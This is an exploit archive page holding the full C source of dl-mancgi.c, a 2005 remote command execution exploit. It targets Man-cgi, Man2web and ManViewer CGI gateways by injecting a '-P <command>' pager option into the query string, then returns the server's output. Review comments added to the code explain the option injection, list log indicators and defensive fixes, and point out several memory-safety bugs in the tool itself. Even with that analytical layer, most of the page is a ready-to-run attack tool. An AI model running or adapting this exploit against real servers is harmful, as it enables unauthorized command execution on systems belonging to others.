
dl-mancgi.c

dl-mancgi.c
Posted Sep 7, 2005
Authored by tracewar

Man-cgi/Man2web/ManView remote command execution exploit. Tested against Man-cgi 1.11. All versions are affected.

tags | exploit, remote, cgi
SHA-256 | 3300bb4e9b0b107c205b3358667f3e44b2322107d91b974768b345a5d6beebc5

dl-mancgi.c

/*
Multiple man-2-web cgi scripts remote command execution exploit
Exploit coded and bugs found by tracewar of DarkLogic.

Greetings goes to:
Matan Peretz - Lijojon :-)
Ofer Shaked
setuid
alex
majestic - do I know you ?
Yacha - Peace.

Special greetings to crazy cookie my perfect girlfriend..
Oh yea and a tiny piece of crap goes to [maorbn], dude you suck get some skills loser ;x

I don't take any responsibility for what this code may do -
the only reason I release this code is for educational purposes!

*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

/*
 * Print the banner, the list of tested targets and the argument synopsis
 * to stderr, then end the process. This function never returns.
 *
 * argv0: program name, substituted into the "usage:" line.
 */
void usage(char *argv0) {
    static const char frame[] = "[PRIVATE] [PRIVATE] [PRIVATE] [PRIVATE] [PRIVATE]\n";

    /* Fixed text above the synopsis; none of it contains a conversion. */
    fputs(frame, stderr);
    fputs("Man-cgi/Man2web/ManViewer Remote Command Execution Exploit\n", stderr);
    fputs("Exploit coded and bugs found by tracewar of DarkLogic\n", stderr);
    fputs("tested against:\n"
          "[+] Man-cgi 1.11 on RedHat Enterprise Linux AS release 3 (Taroon Update 4)\n",
          stderr);
    fputs("[+] Man2web (ALL VERSIONS) - little problem with the cleanup fix it yourself, short "
          "commands problem\n",
          stderr);
    fputs("[+] ManViewer (ALL VERSIONS) - Limited commands\n", stderr);

    /* Synopsis: the only line that depends on the caller's argument. */
    fprintf(stderr,
            "usage: %s <remote_host> <command> <path> <http server port> <target>\n",
            argv0);
    fputs("targets: 0=Man-cgi 1=man2web 2=Man2html\n", stderr);
    fputs(frame, stderr);

    /* The process exits with status 0 even though this is the bad-arguments path. */
    exit(0);
}

/*
 * Command-line driver. Builds a single HTTP GET request line from the
 * arguments, sends it to the given host and port, and prints the part of
 * the reply that sits between two HTML markers.
 *
 *   argv[1]  remote host name
 *   argv[2]  command text placed after "-P" in the query string
 *   argv[3]  path of the CGI script on the server
 *   argv[4]  TCP port of the HTTP server
 *   argv[5]  target selector: 0, 1 or 2 (see usage())
 *
 * Returns 0 on the normal path. On a socket, resolve, connect or send
 * failure it returns the value of printf(), i.e. the number of characters
 * printed, not a conventional error code.
 *
 * NOTE(review): the file does not directly include <string.h>, <stdlib.h>,
 * <strings.h> or <unistd.h>, so memset/strcat/strlen/strncmp, atoi/exit,
 * bcopy and close are used here without a visible prototype.
 */
int main(int argc, char **argv) {
int sock, i, j;
struct sockaddr_in serv_addr;
struct hostent *crap;
char *cp, dummy[50000], buffer[2000] = "GET "; /*
Dummy is huge for the recv() later,
I could've used a pointer and malloc everytime
the while() loop did the trick ;x
You can call me lazy :-)
*/
/* buffer's initializer zero-fills everything after "GET "; the encoding
   loop below depends on that. */

/* Five arguments are required; usage() ends the process. */
if(argc < 6)
usage(argv[0]);

/*
 * Each branch assembles PATH?QUERY in dummy. In all three the query value
 * begins with the option string "-P" followed by argv[2]:
 *   target 0: PATH?-P <argv[2]> ls
 *   target 1: PATH?program=-P <argv[2]> ls
 *   target 2: PATH?section=-P<argv[2]>&topic=w
 *
 * NOTE(review): this is option injection. Presumably the CGI forwards the
 * request parameter to man(1), where -P names the pager program to run;
 * the CGI source is not on this page, so confirm against it.
 * For defenders: the gateway should refuse parameter values that begin
 * with '-' (or pass "--" before the page name), restrict the value to the
 * characters a manual page name can contain, and never hand request data
 * to a shell. In access logs, requests to a man gateway whose query value
 * starts with "-P" match what this tool emits.
 *
 * NOTE(review): argv[3] and argv[2] are appended with strcat() and no
 * length check against dummy's 50000 bytes.
 */
if(atoi(argv[5]) == 0) {
memset(dummy, 0x00, 50000);
strcat(dummy, argv[3]);
strcat(dummy, "?-P ");
strcat(dummy, argv[2]);
strcat(dummy, " ls");
}
else if(atoi(argv[5]) == 1) {
memset(dummy, 0x00, 50000);
strcat(dummy, argv[3]);
strcat(dummy, "?program=-P ");
strcat(dummy, argv[2]);
strcat(dummy, " ls");
}
else if(atoi(argv[5]) == 2) {
memset(dummy, 0x00, 50000);
strcat(dummy, argv[3]);
strcat(dummy, "?section=-P");
strcat(dummy, argv[2]);
strcat(dummy, "&topic=w");
}
else
usage(argv[0]);

/* NOTE(review): the literal "%20" inside this printf format string is read
   as a conversion specification with no matching argument; "%%20" would
   print it as text. */
printf("[+] Made our evil buffer switching spaces with %20 and requesting..\n");
/*
 * Copy dummy into buffer after the "GET " prefix (j starts at 4), writing
 * "%20" for each space. No other character is percent-encoded. strcat()
 * lands on the same position as j because the rest of buffer is still zero.
 * NOTE(review): j is never checked against buffer's 2000 bytes, so a long
 * path or command overruns it.
 */
for(i=0, j=4;i < strlen(dummy);i++) {
if(dummy[i] == ' ') {
strcat(buffer, "%20");
j+=3;
}
else {
buffer[j] = dummy[i];
j++;
}
}

/* The request is only "GET <path>?<query>" plus one CRLF: no HTTP version
   token and no headers (an HTTP/0.9-style simple request). That shape is
   itself a usable log/IDS indicator. */
strcat(buffer, "\r\n");

sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0)
return printf("[-] Error creating socket.\n");
crap = gethostbyname(argv[1]);
if(crap == NULL)
return printf("[-] Cant resolve the specified hostname: %s\n", argv[1]);
else
printf("[+] Resolved the remote hostname, connecting...\n");

/* NOTE(review): serv_addr is not zeroed before its fields are set. */
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(atoi(argv[4]));
bcopy((char *)crap->h_addr, (char *)&serv_addr.sin_addr.s_addr, crap->h_length);

/* NOTE(review): &serv_addr is passed without a cast to struct sockaddr *,
   and the error message prints atoi(argv[3]) (the path) where the port,
   argv[4], was meant. The socket is not closed on the error returns. */
if (connect(sock, &serv_addr, sizeof(serv_addr)) < 0)
return printf("[-] Error connecting to %s:%d\n", argv[1], atoi(argv[3]));

printf("[+] Connected! sending our evil request... ");
if( (send(sock, buffer, strlen(buffer), 0)) == -1 )
return printf("\n[-] Error sending the evil request :(\n");
printf("Sent!\n");
printf("[+] Waiting for the server answer...\n");
/* Both buffers are reused for the reply from here on. */
memset(buffer, 0x00, 2000);
memset(dummy, 0x00, 50000);
printf("[+] Got:\n\n");
/*
 * Accumulate the whole reply in dummy.
 * NOTE(review): recv() does not NUL-terminate and buffer is not cleared
 * between reads. A full 2000-byte read leaves buffer unterminated, and a
 * shorter later read leaves stale bytes from the previous chunk behind it,
 * so strcat() may append extra data or read past buffer. The total is not
 * bounded against dummy's 50000 bytes either, so a large or hostile reply
 * overruns dummy on this process's stack.
 */
while(recv(sock, buffer, 2000, 0) > 0)
strcat(dummy, buffer);

cp = &dummy[0];
i = 0;

/*
Bahhh this filtering sucks ass, you can clean this alot
*/
/*
 * Each branch below scans forward to a start marker (counting the offset
 * in i), scans on to an end marker and writes '\0' there, then points cp
 * at dummy + i + <offset> so the final printf shows the text in between.
 * NOTE(review): none of the scans stop at the end of the data; if a marker
 * is missing from the reply, cp keeps advancing past dummy.
 */

/* Target 0: from the first "<hr>" up to the next "<hr>" or "<A". */
if(atoi(argv[5]) == 0) {
while(strncmp(cp, "<hr>", 4)) {
cp++;
i++;
}
cp+=4;
while(strncmp(cp, "<hr>", 4) && strncmp(cp, "<A", 2))
cp++;
*cp = '\0';
cp = &dummy[0] + i + 4;
}

/* Target 1: start marker is a five-character "<pre>" tag, end marker is the
   next "pre". NOTE(review): "\<" and "\>" are not standard C escape
   sequences; compilers typically warn and treat them as '<' and '>'. */
else if(atoi(argv[5]) == 1) {
while(strncmp(cp, "\<pre\>", 5)) {
cp++;
i++;
}
cp+=4;
while(strncmp(cp, "pre", 3))
cp++;
*cp = '\0';
cp = &dummy[0] + i + 6;
}

/* Target 2: text between the first two occurrences of "PRE". */
else if(atoi(argv[5]) == 2) {
while(strncmp(cp, "PRE", 3)) {
cp++;
i++;
}
cp+=2;
while(strncmp(cp, "PRE", 3))
cp++;
*cp = '\0';
cp = &dummy[0] + i + 2;
}

/* Print the extracted slice of the server reply via "%s", so reply bytes
   are never used as a format string. */
printf("%s", cp);
printf("\n\n");
printf("[+] Good Bye!\n");
close(sock);
return 0;
}